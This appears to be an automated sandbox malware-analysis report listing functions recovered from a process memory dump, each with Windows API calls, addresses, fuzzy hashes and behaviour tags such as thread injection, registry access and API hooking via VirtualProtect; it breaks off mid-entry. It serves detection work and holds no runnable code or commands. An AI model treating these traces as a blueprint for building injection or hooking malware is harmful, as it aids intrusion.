Function 0462209B, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 04622148
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0462215E
memset.NTDLL ref: 046221FE
memset.NTDLL ref: 0462220E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 7c34709b5ebdb972975ddec01da26557b2c4b8d7a8906d6c99105cae6cb08691
Instruction ID: fe0e491038722b5e157b8018c894f1ffe0b42baea8b1b74398e39576d290fec0
Opcode Fuzzy Hash: 7c34709b5ebdb972975ddec01da26557b2c4b8d7a8906d6c99105cae6cb08691
Instruction Fuzzy Hash: 6741A271A00269ABEB109FA8DD94FDE7774EF44314F108569FA19AB280FB70B9448F54

Uniqueness

Uniqueness Score: -1.00%

Function 0462221D, Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,00000000,00000000,00000000,0463A5C8,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04639E84
GetLastError.KERNEL32(?,?,?,0463A5C8,?,?), ref: 04639E9D
ResetEvent.KERNEL32(?,?,?,?,0463A5C8,?,?), ref: 04639F16
GetLastError.KERNEL32(?,?,?,0463A5C8,?,?), ref: 04639F31

Part of subcall function 046307AA: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 046307C1
Part of subcall function 046307AA: SetEvent.KERNEL32(?,?,?,?,0463A5C8,?,?), ref: 046307D1

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: a800df1c3bf9e405d00c18b9810edae606ca888c1ad9e0e212d9cf1424047a43
Instruction ID: de03f65818bff7445bf3be1dc9292d2ab9ff63577907dc26f187b5b4522c6b4a
Opcode Fuzzy Hash: a800df1c3bf9e405d00c18b9810edae606ca888c1ad9e0e212d9cf1424047a43
Instruction Fuzzy Hash: 0D41C372A00684AFDF219FA5CC44AAAB7B9AF94366F10056CF411D3290FBB0F949CF10

Uniqueness

Uniqueness Score: -1.00%

Function 046296DA, Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(?,00000000,00000023), ref: 046296F4
StrChrA.SHLWAPI(?,0000005C), ref: 0462971B
lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 04629741
lstrcpy.KERNEL32(?,6E6B6E55), ref: 046297E5

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrcpylstrcpyn
String ID:
API String ID: 4154805583-0
Opcode ID: 09bf0a4207d5e62010ad5797c1ebff5850525b3b1f1c899cfd632a0fa26714a4
Instruction ID: 78672b802f2721afa1d31a544e850b071588396bdcae006a639e3776ee8fb417
Opcode Fuzzy Hash: 09bf0a4207d5e62010ad5797c1ebff5850525b3b1f1c899cfd632a0fa26714a4
Instruction Fuzzy Hash: 5A415BB6900529BFDF119FA4CD84DEE7BBCEB49350F0444A6E941E3241E734AA48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0462A4BF, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0462A4ED
ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0462A577
WaitForSingleObject.KERNEL32(00000064), ref: 0462A585
SuspendThread.KERNEL32(?), ref: 0462A598

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: 552eaa80f74b6d7f55657bbfcb01da30b7e32b4dbd20962540c2957ed6fe7495
Instruction ID: 8ca8117a923d9188e9917e90c3479b49b2f8f2da8e6dab54c7c481f2ab3bb964
Opcode Fuzzy Hash: 552eaa80f74b6d7f55657bbfcb01da30b7e32b4dbd20962540c2957ed6fe7495
Instruction Fuzzy Hash: CD416DB1104701BFEB21DF94CD8196BBBE9FF98354F00492DFA9492260E771E954CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0462A819, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04625930: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0462593E

RtlAllocateHeap.NTDLL(00000000,?), ref: 0462A881
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0462A8D2

Part of subcall function 046229AD: CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000), ref: 046229ED
Part of subcall function 046229AD: GetLastError.KERNEL32 ref: 046229F7
Part of subcall function 046229AD: WaitForSingleObject.KERNEL32(000000C8), ref: 04622A1C
Part of subcall function 046229AD: CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 04622A3F
Part of subcall function 046229AD: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 04622A67
Part of subcall function 046229AD: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 04622A7C
Part of subcall function 046229AD: SetEndOfFile.KERNEL32(?), ref: 04622A89
Part of subcall function 046229AD: CloseHandle.KERNEL32(?), ref: 04622AA1

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,04631408,?,?,?,?,?,00000000,?,00000000), ref: 0462A907
HeapFree.KERNEL32(00000000,?,?,04631408,?,?,?,?,?,00000000,?,00000000,?,04625C07,?), ref: 0462A917

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 4200334623-0
Opcode ID: 8997597bfc2b20523519826eadc44814b4a27b0db41de5be47d11a90ab7bf0aa
Instruction ID: c46e9c469ae31f12d456953f522aa30cd45d0798fc4445ed4bd0fff5145c734e
Opcode Fuzzy Hash: 8997597bfc2b20523519826eadc44814b4a27b0db41de5be47d11a90ab7bf0aa
Instruction Fuzzy Hash: DF3157BA910129FFEB109FA4CD89CAEBBBDEB58340B110065F601D3210E775AE50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04632986, Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 046329CD
_strupr.NTDLL ref: 04632A1F
_strupr.NTDLL ref: 04632A5A
_strupr.NTDLL ref: 04632A90

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 3ca5ff88c2254ccaac68532eccca30e21a9d199fd0195112f52a167511b724c2
Instruction ID: 96f828eb02dc54882f94b4f87216262a6b7b25da25a12c081eb91889ef55f7d3
Opcode Fuzzy Hash: 3ca5ff88c2254ccaac68532eccca30e21a9d199fd0195112f52a167511b724c2
Instruction Fuzzy Hash: 6D414B728002499FDF34DF68E894AEEB7A8FF94346F204566E824D6254FB34E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 046307AA, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 046307C1
SetEvent.KERNEL32(?,?,?,?,0463A5C8,?,?), ref: 046307D1
GetLastError.KERNEL32 ref: 0463085A

Part of subcall function 0463EAF1: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,04641F53,0000EA60,?,?,?,0463DC39,00000000,0000EA60,00000000), ref: 0463EB0C

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

GetLastError.KERNEL32(00000000), ref: 0463088F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 573662737ed85ee5eef1292f5d21629c9532c52134a1cd46b5ab54253360678f
Instruction ID: 8da2f4fe913451d8562a708dc9db65d3c845036ade0bd3cba06ffa9a7c4d52c0
Opcode Fuzzy Hash: 573662737ed85ee5eef1292f5d21629c9532c52134a1cd46b5ab54253360678f
Instruction Fuzzy Hash: 38316DB5D00348EFDF20DFA5C8C499EBBB8FB08305F10496AE542A2641E774AA489F50

Uniqueness

Uniqueness Score: -1.00%

Function 04638C46, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 04638C75
SetEvent.KERNEL32(?), ref: 04638CBF
TlsSetValue.KERNEL32(00000001), ref: 04638CF9
TlsSetValue.KERNEL32(00000000), ref: 04638D15

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: d4214f4864b626b43b238f77ac0ec094e59904a0db493a99d74e2e2565c84d2c
Instruction ID: b1f79095cb7a8219d1170cac4177233c631eb3f7c07d8d56840639ef67dc0870
Opcode Fuzzy Hash: d4214f4864b626b43b238f77ac0ec094e59904a0db493a99d74e2e2565c84d2c
Instruction Fuzzy Hash: 26219F79100284AFEF21AF69DD45AAA7BE2FF91B12B10042AF512C7660F771FC61DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0462366F, Relevance: 6.1, APIs: 4, Instructions: 83memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04631420: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 0463145C
Part of subcall function 04631420: memset.NTDLL ref: 046314DD
Part of subcall function 04631420: memset.NTDLL ref: 046314F2

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 046236C8
lstrcmpi.KERNEL32(00000000,6E69614D), ref: 046236EF
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04623736
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04623747

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: f38027142785acdb1d0cb6212a14f6181f8ff30969f0d44c991db8d3251663d9
Instruction ID: 4edd50e0300def3f2f953384635d0092d262239204475699a84125b5af620f56
Opcode Fuzzy Hash: f38027142785acdb1d0cb6212a14f6181f8ff30969f0d44c991db8d3251663d9
Instruction Fuzzy Hash: A5219EB9600219FFEF10AFA4DD84AAD7BB8EB54349F008024E901E7210F738ED958F14

Uniqueness

Uniqueness Score: -1.00%

Function 0462E2AD, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0462E306
memcpy.NTDLL(00000018,?,?), ref: 0462E32F
RegisterWaitForSingleObject.KERNEL32(00000010,?,046300F3,00000000,000000FF,00000008), ref: 0462E36E
HeapFree.KERNEL32(00000000,00000000), ref: 0462E381

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: 0041977e7fa4f752696214b4db80b81b9c7797ce8a539ec96bab086e677c000b
Instruction ID: 321e9f974da2bf1611610200bc37e26aedefea13383d1997c0480f3dff2a73fc
Opcode Fuzzy Hash: 0041977e7fa4f752696214b4db80b81b9c7797ce8a539ec96bab086e677c000b
Instruction Fuzzy Hash: D5318174100716AFEB209F24DC44E9A7BA9EF54762F008229F915D7390EB75ED15CF60

Uniqueness

Uniqueness Score: -1.00%

Function 046312E4, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04631313
lstrlen.KERNEL32(00000000), ref: 04631324

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

strcpy.NTDLL ref: 0463133B
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04631345

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: bcfdee81866104380acad8f1d3b30b13c031721a360636015201c7d854ddd3ba
Instruction ID: f4af30e94acdb99909294f6d1f302435ef12bc53a9732a646eb0b9a801db112d
Opcode Fuzzy Hash: bcfdee81866104380acad8f1d3b30b13c031721a360636015201c7d854ddd3ba
Instruction Fuzzy Hash: 5421C276500341AFFB206F64D849BAA77A8EF96713F00951DF89686291FB74E8048B11

Uniqueness

Uniqueness Score: -1.00%

Function 04630ED6, Relevance: 6.1, APIs: 4, Instructions: 76memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 046238C5: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0462390A
Part of subcall function 046238C5: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04623922
Part of subcall function 046238C5: WaitForSingleObject.KERNEL32(00000000), ref: 046239EA
Part of subcall function 046238C5: HeapFree.KERNEL32(00000000,?), ref: 04623A13
Part of subcall function 046238C5: HeapFree.KERNEL32(00000000,?), ref: 04623A23
Part of subcall function 046238C5: RegCloseKey.ADVAPI32(?), ref: 04623A2C

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

Part of subcall function 04633D02: lstrlen.KERNEL32(00000000,00000000,00000008,00000000,04625FA3,00000000,745EC740,00000000,00000000,00000000,046370F4,00000000,00000000,00000000,00000000,00000000), ref: 04633D09
Part of subcall function 04633D02: mbstowcs.NTDLL ref: 04633D32
Part of subcall function 04633D02: memset.NTDLL ref: 04633D44

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

PathFindFileNameW.SHLWAPI(00000000,00000000,00000000,?,000000D3), ref: 04630F32

Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,73BCFC30,745EC740,?,00000250,?,00000000), ref: 0462F91A
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,?,00000000), ref: 0462F926
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F96E
Part of subcall function 0462F8CE: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462F989
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(0000002C), ref: 0462F9C1
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?), ref: 0462F9C9
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F9EC
Part of subcall function 0462F8CE: wcscpy.NTDLL ref: 0462F9FE

DeleteFileW.KERNEL32(?,00000000,002E002A,?,00000000,00000000,00000000,?,000000D3), ref: 04630F6E
HeapFree.KERNEL32(00000000,?,?,000000D3), ref: 04630F87
HeapFree.KERNEL32(00000000,?,00000000,002E002A,?,00000000,00000000,00000000,?,000000D3), ref: 04630F9A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$FileFreelstrlen$PathTempmemset$AllocateFindNameTime$CloseCurrentDeleteFirstObjectSingleSystemThreadWaitlstrcpymbstowcswcscpy
String ID:
API String ID: 3311952166-0
Opcode ID: d1391accf4e91c22a8e2e1dad0e65df586da5ce4aafc12aa50dc3e1aeac6eb8f
Instruction ID: fda6f096e854a8a1d48941092a509f5147241bf803f4b903600643998c51a545
Opcode Fuzzy Hash: d1391accf4e91c22a8e2e1dad0e65df586da5ce4aafc12aa50dc3e1aeac6eb8f
Instruction Fuzzy Hash: 02216F75901224AFCF20EFA5DD88D9FBBBCEF89714B10441AF505E7244E774A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04641A6E, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 04641A84
RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 04641A9F
GetLastError.KERNEL32 ref: 04641B0D
GetLastError.KERNEL32 ref: 04641B1C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 614e77f38f5aa94e4835f870e5d721d1a8ae2e1ecfcc409effe6586c4cc17ff2
Instruction ID: 9ecfbc921840e939c23978be24ed250c38c204cf6e8e4d9afdb04e3694401536
Opcode Fuzzy Hash: 614e77f38f5aa94e4835f870e5d721d1a8ae2e1ecfcc409effe6586c4cc17ff2
Instruction Fuzzy Hash: 93214B3A900208EFCF12DFA4D849ADE7BB8FF89B60B059155F805A3210E738ED55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04630216, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04630238
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 0463027C
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 046302BF
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 046302E2

Part of subcall function 04622E3A: GetTickCount.KERNEL32 ref: 04622E4A
Part of subcall function 04622E3A: CreateFileW.KERNEL32(?,80000000,00000003,04648168,00000003,00000000,00000000), ref: 04622E67
Part of subcall function 04622E3A: GetFileSize.KERNEL32(?,00000000,61636F4C,00000001), ref: 04622E9A
Part of subcall function 04622E3A: CreateFileMappingA.KERNEL32(?,04648168,00000002,00000000,00000000,?), ref: 04622EAE
Part of subcall function 04622E3A: lstrlen.KERNEL32(?), ref: 04622ECA
Part of subcall function 04622E3A: lstrcpy.KERNEL32(?,?), ref: 04622EDA
Part of subcall function 04622E3A: HeapFree.KERNEL32(00000000,?), ref: 04622EF5
Part of subcall function 04622E3A: CloseHandle.KERNEL32(?,61636F4C,00000001), ref: 04622F07

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: f8401d083ad045db9f0770de229a70ae99c9842bd6241a73aa466d922cca1aa8
Instruction ID: e20d7793f99af8dc38dbbed1064ffed587ee5410ccf5b63f338f22e5f6d4afca
Opcode Fuzzy Hash: f8401d083ad045db9f0770de229a70ae99c9842bd6241a73aa466d922cca1aa8
Instruction Fuzzy Hash: 22212A31900248EFDF21DFA6DD44EEE7BB9EF94355F100129F925A2264FB30A949CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04634334, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 04638DDB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0463434B), ref: 04638E01

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04634386
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0462AD86,4C72644C), ref: 04634398
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0462AD86,4C72644C), ref: 046343B0
CloseHandle.KERNEL32(?,?,?,?,?,?,0462AD86,4C72644C), ref: 046343CB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: b661f397321aa096ce538bd4e275bf7b1c36ed180896d2c044496dabcfd438f1
Instruction ID: 45bb4845b0e86c34f4e7c154a94e1a1a21e37c8b98676fb286fe5c3d8416253a
Opcode Fuzzy Hash: b661f397321aa096ce538bd4e275bf7b1c36ed180896d2c044496dabcfd438f1
Instruction Fuzzy Hash: 32119371900228BBEF20AF66DC89EEFBE6CEF52756F104115F505E2150EB70AE50CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 046256C1, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?), ref: 046256F9

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

lstrcpy.KERNEL32(00000000,?), ref: 04625710
StrChrA.SHLWAPI(00000000,0000002E), ref: 04625719
GetModuleHandleA.KERNEL32(00000000), ref: 04625737

Part of subcall function 04635CEA: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,?), ref: 04635DC2
Part of subcall function 04635CEA: VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,00000000,00000004,?,?,?,00000000,?,046445F0,0000001C,04622B4B), ref: 04635DDD
Part of subcall function 04635CEA: RtlEnterCriticalSection.NTDLL(04648380), ref: 04635E02

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 3b0a145047c40eae253094a7b93a30aefdd3fe96d40505dbea859e60c0ef85e7
Instruction ID: 62772d8a09f27902ce48d632e9c9a6382c74fc1c7d8e623bb830d0046724e2a1
Opcode Fuzzy Hash: 3b0a145047c40eae253094a7b93a30aefdd3fe96d40505dbea859e60c0ef85e7
Instruction Fuzzy Hash: 1F213A74A00705FFDB20DF68CA88AAEBBB9EF88704F148059E4069B351EB74E941DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0462376C, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,73BB8250,73B769A0,?,?,?,0463A09C,?,00000000,00000001), ref: 0462377C

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0463A09C,?,00000000,00000001), ref: 0462379E
lstrcpyW.KERNEL32(00000000,?), ref: 046237CA
lstrcatW.KERNEL32(00000000,006C005C), ref: 046237DD

Part of subcall function 0463275A: strstr.NTDLL ref: 04632832
Part of subcall function 0463275A: strstr.NTDLL ref: 04632885

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID:
API String ID: 3712611166-0
Opcode ID: 2682d98b9a774150f00c6259fcb0857f7588b066af9dcddbe7f6273c5b7a9eb7
Instruction ID: 6e4edfa4d79c1fa947c23d7f567b1cb22c9082cd3c80dbedccac20eff300413d
Opcode Fuzzy Hash: 2682d98b9a774150f00c6259fcb0857f7588b066af9dcddbe7f6273c5b7a9eb7
Instruction Fuzzy Hash: C1114776501429BFDF11AFA0DC89DDE7FADEF56364B104024F9019A210EB38EA91CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0463B782, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 0463B79D
RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 0463B7C1
RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 0463B819

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 0463B7EA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: be6a590e50dc42be55c6152183bab19916d8ae9cf17be654ef59007d46b2963b
Instruction ID: 2456b16551d69c785d0f5397da342a822f4e2a1fd92789a35422f7cbe83b24e0
Opcode Fuzzy Hash: be6a590e50dc42be55c6152183bab19916d8ae9cf17be654ef59007d46b2963b
Instruction Fuzzy Hash: 3121E7B590114CFFDF11DF94D9848EE7BBDEB88751F248066E801A7211E771AA90DB50

Uniqueness

Uniqueness Score: -1.00%

Function 046255DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04631EC0,00000000,?,?,046305C4,00000000,05D3C0E0), ref: 046255E8
RtlAllocateHeap.NTDLL(00000000,?), ref: 04625600
memcpy.NTDLL(00000000,?,-00000008,?,?,?,04631EC0,00000000,?,?,046305C4,00000000,05D3C0E0), ref: 04625644
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 04625665

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 38d6b4ac905c94a0a2b8bb871810e4850a1ec9debb0ef27e15a7bd74e6003fdc
Instruction ID: e11f3e50a24d012c5cc48d6e25a8423030ead0c0a13e8a92acd60977870b9d0d
Opcode Fuzzy Hash: 38d6b4ac905c94a0a2b8bb871810e4850a1ec9debb0ef27e15a7bd74e6003fdc
Instruction Fuzzy Hash: F7112976A00214BFD7108B69DD84EAEBBAEDBD0691B054176F505D7250FB749E008B60

Uniqueness

Uniqueness Score: -1.00%

Function 0462F836, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,?,7656D3B0,05D3C0D4,00000000,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F85C
StrTrimA.SHLWAPI(00000000,04644510,00000000,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F87B
StrChrA.SHLWAPI(00000000,?,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F88C
StrTrimA.SHLWAPI(00000001,04644510,?,?,046255C8,?,00000020,05D3C0D4), ref: 0462F89E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 833acbf02dc37a576ef786564e03755b60e4374161e13b769c9229d380df92ea
Instruction ID: 19f2ef6a852b56b10030584b13ead201c9b6063a2a4fb0472ffa96256e720c26
Opcode Fuzzy Hash: 833acbf02dc37a576ef786564e03755b60e4374161e13b769c9229d380df92ea
Instruction Fuzzy Hash: B2118F75600219BFCF058F58D984EAA7BB8EB85791F108009FC059B201EB74EA41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0462CD30, Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(00000000), ref: 0462CD70
memset.NTDLL ref: 0462CD84
GetWindowThreadProcessId.USER32(00000000,?), ref: 0462CD91

Part of subcall function 04634BF1: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,00000000,00000000,?,?,?,04621BC3,?,?,?,00000000), ref: 04634C48
Part of subcall function 04634BF1: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,00000000,00000000,?,?,?,04621BC3,?), ref: 04634C66
Part of subcall function 04634BF1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04634CCE

GlobalUnWire.KERNEL32(00000000), ref: 0462CDBC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
String ID:
API String ID: 3286078456-0
Opcode ID: 32d3656a7ba307c5e269714c4999202807de722df94af5f6c6ccafa9f9c9c5e0
